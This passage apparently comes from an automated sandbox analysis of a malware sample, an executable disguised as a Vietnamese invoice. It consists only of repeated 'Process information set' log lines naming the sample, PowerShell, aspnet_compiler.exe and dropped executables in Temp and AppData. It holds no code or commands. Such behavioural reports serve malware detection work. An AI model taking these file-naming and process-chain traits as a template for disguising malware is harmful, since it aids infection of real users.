              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeProcess information set: NOOPENFILEERRORBOX
